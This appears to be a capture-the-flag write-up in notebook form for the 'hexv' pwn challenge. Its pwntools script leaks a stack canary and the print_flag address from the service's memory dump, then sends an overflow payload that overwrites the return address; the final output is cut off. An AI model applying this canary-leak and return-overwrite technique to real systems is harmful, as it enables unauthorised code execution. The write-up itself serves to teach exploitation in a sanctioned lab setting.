hexv
====

## Challenge
This is a good pwn challenge to start with. Use the help button to ask for a hint if you get stuck.

Sourceless, binaryless, full-protection beginner pwn! (not clickbait)

``` ncat --ssl hexv.challs.pwnoh.io 1337 ```

## Analysis
First step's first, let's connect to the endpoint

In [1]:
from pwn import *
context.encoding = "utf-8"
conn = remote("hexv.challs.pwnoh.io", 1337, ssl=True)
print(conn.recvline().decode())

[x] Opening connection to hexv.challs.pwnoh.io on port 1337
[x] Opening connection to hexv.challs.pwnoh.io on port 1337: Trying 2600:1f16:75:1c01::4
[+] Opening connection to hexv.challs.pwnoh.io on port 1337: Done
hexv 0.1.0 (beta)



Let's try sending it some stuff

In [2]:
conn.writeline(b"deadbeef")
print(conn.recvline().decode())

>> ERROR: unrecognized command. Use `help` to list available commands.



A help command is useful! Let's see

In [3]:
conn.writeline(b"help")
[print(x) for x in conn.recvlinesS(8)];

>> hexv - a modern hex dump tool
─────────────────────────────
help:       display this menu
hex <str>:  convert a string to hexadecimal and print
str <hex>:  convert hexadecimal to a string and print
dump:       dump current memory
funcs:      display functions and their addresses
quit:       quit tool


Let's investigate some of these commands

In [4]:
conn.writeline(b"hex helloworld")
conn.writeline(b"str 68656C6C6F776F726C64")
conn.writeline(b"dump")
conn.writeline(b"funcs")
conn.writeline(b"quit")
print(conn.recvallS())

[x] Receiving all data
[x] Receiving all data: 3B
[x] Receiving all data: 27B
[x] Receiving all data: 62B
[x] Receiving all data: 320B
[x] Receiving all data: 1.73KB
[x] Receiving all data: 2.76KB
[x] Receiving all data: 3.32KB
[+] Receiving all data: Done (3.32KB)
[*] Closed connection to hexv.challs.pwnoh.io port 1337
>> 68656C6C6F776F726C64
>> helloworld
>> ┌────────────────────────────────────────────────────────────────────┐
│ Memory Layout                                                      │
├────────────────────────────────────────────────────────────────────┤
│ 0x7ffc46fd56b0  64 75 6d 70  00 77 6f 72  6c 64 00 43  36 46 37 37 │
│ 0x7ffc46fd56c0  36 46 37 32  36 43 36 34  00 00 00 00  00 00 00 00 │
│ 0x7ffc46fd56d0  40 f0 e6 95  18 56 00 00  0d 00 00 00  00 00 00 00 │
│ 0x7ffc46fd56e0  50 57 fd 46  fc 7f 00 00  c9 59 fd 46  fc 7f 00 00 │
│ 0x7ffc46fd56f0  e0 e5 ad 05  63 7f 00 00  9d 0e e7 95  18 56 00 00 │
│ 0x7ffc46fd5700  e8 02 ad 05  63 7f 00 00  50 0e e7 95  18 56 00 00 

Let's try overflowing the memory buffer - this could be an RCE. The chocies of colour in the memory dump are curious, I suspect these represent the values to target (perhaps a stack canary and return pointer)

In [11]:
conn = remote("hexv.challs.pwnoh.io", 1337, ssl=True)
conn.writeline(b"str " + b"4142434445464748" * 8)
conn.writeline(b"dump")
conn.writeline(b"quit")
print(conn.recvallS())


[x] Opening connection to hexv.challs.pwnoh.io on port 1337
[x] Opening connection to hexv.challs.pwnoh.io on port 1337: Trying 2600:1f16:75:1c01::4
[+] Opening connection to hexv.challs.pwnoh.io on port 1337: Done
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 21B
[x] Receiving all data: 89B
[x] Receiving all data: 200B
[x] Receiving all data: 345B
[x] Receiving all data: 1.09KB
[x] Receiving all data: 2.37KB
[x] Receiving all data: 3.02KB
[+] Receiving all data: Done (3.02KB)
[*] Closed connection to hexv.challs.pwnoh.io port 1337
hexv 0.1.0 (beta)
>> ABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGH
>> ┌────────────────────────────────────────────────────────────────────┐
│ Memory Layout                                                      │
├────────────────────────────────────────────────────────────────────┤
│ 0x7ffd30739770  64 75 6d 70  00 46 47 48  41 42 43 44  45 46 47 48 │
│ 0x7ffd30739780  41 42 43 44  45 46 47 48  41 42 43 44  45 4

When we carefully overflow only into the red portion, we receive a stack smashing error - this is certainly a stack canary. Let's now construct a payload, assuming the blue value is the return pointer

In [6]:
import re

# ANSI escape sequence stripper, courtesy of ChatGPT
_ANSI_RE = re.compile(r'(?:\x1B\[[0-?]*[ -/]*[@-~]|\x1B\][^\x07]*(?:\x07|\x1B\\)|\x1B[P^_].*?\x1B\\|\x1B.)', re.DOTALL)

conn = remote("hexv.challs.pwnoh.io", 1337, ssl=True)
conn.readuntil(">>")

# parse function pointers:
conn.writeline(b"funcs")
conn.readlinesS(2) # skip header
funcs = conn.readuntilS(">>")
funcMap = dict([line.split("  ")[::-1] for line in _ANSI_RE.sub('', funcs).splitlines()[:-1]])

printFlag = enhex(int(funcMap["print_flag"], 16).to_bytes(length=8, byteorder="little")).encode()
print("print_flag is at", printFlag)

# get the stack canary
conn.sendline("dump")
conn.readlines(3) # skip header
memoryLines = conn.recvuntilS(">>")
print(memoryLines)
memoryLines = _ANSI_RE.sub('', memoryLines).splitlines()[:-2]

memory = []
for line in memoryLines:
    split = line[2:-2].split("  ", 1)
    startAddress = split[0]
    vals = [int(x, 16) for x in split[1].split()]
    memory.append((startAddress, vals))

canary = enhex(u64(bytes(memory[-3][1][8:])).to_bytes(length=8, byteorder="little")).encode()
print("Stack canary is", canary)

# Construct payload with 15 words of padding, the canary, another word of padding, then the address of the printFlag function
payload = b"4142434445464748" * 15 + canary + b"4142434445464748" + printFlag

print(payload)
conn.writeline(b"str " + payload)
conn.writeline(b"dump")
conn.writeline(b"quit")
print(conn.readallS())

[x] Opening connection to hexv.challs.pwnoh.io on port 1337
[x] Opening connection to hexv.challs.pwnoh.io on port 1337: Trying 2600:1f16:75:1c01::4
[+] Opening connection to hexv.challs.pwnoh.io on port 1337: Done
print_flag is at b'e992edf045560000'
│ 0x7ffced99a380  64 75 6d 70  00 00 00 00  00 00 00 00  00 00 00 00 │
│ 0x7ffced99a390  00 00 00 00  00 00 00 00  05 00 00 00  00 00 00 00 │
│ 0x7ffced99a3a0  40 80 ed f0  45 56 00 00  0d 00 00 00  00 00 00 00 │
│ 0x7ffced99a3b0  20 a4 99 ed  fc 7f 00 00  99 a6 99 ed  fc 7f 00 00 │
│ 0x7ffced99a3c0  e0 55 f2 71  7b 7f 00 00  9d 9e ed f0  45 56 00 00 │
│ 0x7ffced99a3d0  e8 72 f1 71  7b 7f 00 00  50 9e ed f0  45 56 00 00 │
│ 0x7ffced99a3e0  00 00 00 00  00 00 00 00  00 92 ed f0  45 56 00 00 │
│ 0x7ffced99a3f0  f0 a4 99 ed  fc 7f 00 00  00 d1 b9 ab  3a 7b 20 17 │
│ 0x7ffced99a400  00 00 00 00  00 00 00 00  83 a0 d4 71  7b 7f 00 00 │
│ 0x7ffced99a410  01 00 00 00  02 00 00 00  f8 a4 99 ed  fc 7f 00 00 │
└─────────────────────────────────────